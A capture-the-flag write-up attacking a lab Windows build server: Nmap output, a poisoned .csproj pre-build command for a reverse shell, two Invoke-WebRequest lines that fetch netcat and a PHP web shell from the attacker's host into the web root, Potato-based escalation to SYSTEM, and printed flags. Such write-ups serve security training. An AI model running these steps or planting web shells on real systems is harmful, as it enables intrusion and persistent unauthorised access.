Nmap Results
# Nmap 7.94SVN scan initiated Wed Feb 14 15:43:16 2024 as: nmap -Pn -p- --min-rate 2000 -A -oN nmap.txt 10.10.11.234
Nmap scan report for 10.10.11.234
Host is up (0.014s latency).
Not shown: 64813 filtered tcp ports (no-response), 721 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.1.17)
|_http-title: Visual - Revolutionizing Visual Studio Builds
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
OS fingerprint not ideal because: Didn't receive UDP response. Please try again with -sSU
No OS matches for host
TRACEROUTE (using port 9996/tcp)
HOP RTT ADDRESS
1 14.56 ms 10.10.14.1
2 ... 30
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Feb 14 15:45:51 2024 -- 1 IP address (1 host up) scanned in 155.22 seconds
Service Enumeration
TCP/80
Exploring the Application
Simply provide us with your Git Repo link, and we'll handle the rest. Our cutting-edge technology compiles your projects and sends back the executable or DLL files you need, effortlessly and efficiently.
Whatever you enter into the text box will be submitted as a HTTP POST
request to http://10.10.11.234/submit.php
as type of url
with the gitRepoLink
as the name
field and our input as the value
.
Let's just test the application as a normal user for now — inputting a real GitHub repo link — and catch it in Burp Suite to see what that looks like.
Testing the Build Form
We know this target is not going to have Internet access, so let's git clone
the repo and host it locally to see if it will pull the file(s).
git clone https://github.com/0xBEN/PSToolbox.git
sudo python3 -m http.server 80 --directory ./PSToolbox
Submit
and the target attempting to fetch the resources from the attacker-controlled server, likely due to some kind of queue involved with the build procedure.Understanding the Build Process
So far, we can see some breadcrumbs referencing git-upload-pack
and a .sln
file.
It seems that a git
client on the target is attempting to git clone
our repository locally and compile the code. We can't be certain about the underlying git
operations on the target, so we should find a way to host a better git
server.
Searching for Exploits
I tried searching Google for intext:"git-upload-pack" exploit
but didn't see anything too promising. However, my next search did return something interesting.
Experimenting with EvilSln
This requires that the
.sln
file be opened in Visual Studio to execute the malicious .sudo
file. I think this target is simply doing git clone
and compiling on the command line. The reference to .sln
in the error output was misleading.Understanding the Exploit
Reading over the exploit write-up, Visual Studio will read data from a .suo
file in the .vs
folder hierarchy and deserialize some binary data when a .sln
file is opened. An attacker could create a project with a pre-existing poisoned .suo
file. Because the binary data is deserialized, the data is run in memory, causing code execution without requiring the compiler to run. Furthermore, it does not place typical restrictions on .sln
files — even when the files are downloaded over HTTP.
I used wine
on Kali Linux to generate the ysoserial
payload and place it in the .suo
file. I have notes on installing wine
on Kali Linux here:
Creating and Testing the Payload
git
based attack, we can't just git clone
and modify files. Since git
is a version-control system, any time we modify files, we have to commit them to the repository.Referencing the EvilSln readme, we know that the BinaryFormatter.Deserialize
happens on the ToolboxItemContainer
object. I tried outputting hex
and base64
without any luck.
github.com
to your repository, cd
into your directory locally and run git pull
to get the latest set of files.I know that the .sln
file was opened by the server as it's in the error output, so it seems this payload is not going to work. As I mentioned before, this is likely due to compiling being done on the command line as opposed to opening with Visual Studio.
Build FAILED.
"C:\Windows\Temp\715d2d5ea064dc63add6e11b1a90f3\App1.sln" (default target) (1) ->
(Build target) ->
C:\Windows\Temp\715d2d5ea064dc63add6e11b1a90f3\App1.sln.metaproj : error MSB3202: The project file "C:\Windows\Temp\715d2d5ea064dc63add6e11b1a90f3\App1\App1.csproj" was not found. [C:\Windows\Temp\715d2d5ea064dc63add6e11b1a90f3\App1.sln]
0 Warning(s)
1 Error(s)
Time Elapsed 00:00:00.09
Experimenting with Pre-Compile Exploits
We can use the existing EvilSln
forked repository for this next step. We note in the repository readme that we should be able to poison a .sln
or .csproj
file to gain command execution on the target. This happens, because these commands are executed prior to compiling.
I searched Google for example: .csproj
files that I could duplicate.
If we look at the App1.sln
file, you can see that it points to App1/App1.csproj
, so we'll put the data there.
Submit the GitHub repository in the target form and wait for it to pull your files and compile the project.
Exploit
Reverse Shell
The application on the target does not take any steps to ensure that GitHub repositories it pulls do not contain any malicious files before compilation. Since Visual Studio projects present a wide attack surface, the service provider has a difficult task of creating a multi-faceted approach to ensure that files are sanitized and that certain commands are not run.
This is the command to inset into your .csproj
file. We must use the "
escapes, as we're nesting "
inside an XML node attribute. Otherwise, the XML parser would view them as XML data.
Shell Upgrade
xampp
server as evidenced by the Server
banner being Apache
and the presence of a C:\xampp
directory. I want to be able to continue to run commands on the target even if my shell dies, so I'll add a PHP web shell there for quick recovery.I'm going to save this PHP shell locally in sh.php
. I'm also going to store nc.exe
in the xampp
directory for easy access. I can use the HTTP server I already have running using python3
.
Invoke-WebRequest http://10.10.14.15/nc64.exe -O C:\xampp\htdocs\nc.exe
Invoke-WebRequest http://10.10.14.15/sh.php -O C:\xampp\htdocs\sh.php
Post-Exploit Enumeration
Operating Environment
OS & Kernel
USER INFORMATION
----------------
User Name SID
=========== =============================================
visual\enox S-1-5-21-328618757-2344576039-2580610453-1003
GROUP INFORMATION
PS C:\> systeminfo
systeminfo
Host Name: VISUAL
OS Name: Microsoft Windows Server 2019 Standard
OS Version: 10.0.17763 N/A Build 17763
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00429-00521-62775-AA642
Original Install Date: 6/10/2023, 9:08:12 AM
System Boot Time: 2/16/2024, 10:41:46 AM
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
[02]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
BIOS Version: VMware, Inc. VMW71.00V.16707776.B64.2008070230, 8/7/2020
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume2
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory: 4,095 MB
Available Physical Memory: 3,103 MB
Virtual Memory: Max Size: 4,799 MB
Virtual Memory: Available: 3,928 MB
Virtual Memory: In Use: 871 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0 2
DHCP Enabled: No
IP address(es)
[01]: 10.10.11.234
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
Current User
USER INFORMATION
----------------
User Name SID
=========== =============================================
visual\enox S-1-5-21-328618757-2344576039-2580610453-1003
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
==================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
Users and Groups
Local Users
-------------------------------------------------------------------------------
Administrator DefaultAccount enox
Guest WDAGUtilityAccount
Local Groups
*Access Control Assistance Operators
*Administrators
*Backup Operators
*Certificate Service DCOM Access
*Cryptographic Operators
*Device Owners
*Distributed COM Users
*Event Log Readers
*Guests
*Hyper-V Administrators
*IIS_IUSRS
*Network Configuration Operators
*Performance Log Users
*Performance Monitor Users
*Power Users
*Print Operators
*RDS Endpoint Servers
*RDS Management Servers
*RDS Remote Access Servers
*Remote Desktop Users
*Remote Management Users
*Replicator
*Storage Replica Administrators
*System Managed Accounts Group
*Users
Network Configurations
Network Interfaces
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 10.10.11.234
Subnet Mask . . . . . . . . . . . : 255.255.254.0
Default Gateway . . . . . . . . . : 10.10.10.2
Open Ports
:: 49668 :: 0 Listen
:: 49667 :: 0 Listen
:: 49666 :: 0 Listen
:: 49665 :: 0 Listen
:: 49664 :: 0 Listen
:: 47001 :: 0 Listen
:: 5985 :: 0 Listen
:: 445 :: 0 Listen
:: 443 :: 0 Listen
:: 135 :: 0 Listen
:: 80 :: 0 Listen
0.0.0.0 49668 0.0.0.0 0 Listen
0.0.0.0 49667 0.0.0.0 0 Listen
0.0.0.0 49666 0.0.0.0 0 Listen
0.0.0.0 49665 0.0.0.0 0 Listen
0.0.0.0 49664 0.0.0.0 0 Listen
0.0.0.0 443 0.0.0.0 0 Listen
10.10.11.234 139 0.0.0.0 0 Listen
0.0.0.0 135 0.0.0.0 0 Listen
0.0.0.0 80 0.0.0.0 0 Listen
Processes and Services
Interesting Services
Name : ApacheHTTPServer
StartName : NT AUTHORITY\Local Service
PathName : "C:\Xampp\apache\bin\httpd.exe" -k runservice
Privilege Escalation
Lateral to LocalService
Ironically, while doing this write-up, I didn't realize that my privilege escalation would turn to a pivot to the Apache web server itself. But, after some lengthy enumeration, I saw a viable privilege escalation path that could involve becoming a service account.
I'll just leverage the sh.php
and nc.exe
files I dropped in C:\xampp\htdocs\
earlier in the write-up.
We can use the FullPowers.exe
binary to recover the default privileges that service accounts on Windows used to ship with.
Escalate to SYSTEM
Now that we have the SeImpersonatePrivilege
, we can pretty easily use a Potato attack to spawn a process with NT AUTHORITY\SYSTEM
privileges. GodPotato
is very convenient in that it can run on even the most recent versions of Windows operating systems.
Flags
User
6b3ae73302c2c968f9da85e9be424f8b
Root
06f07741b732e5dd8109cf61cbd27798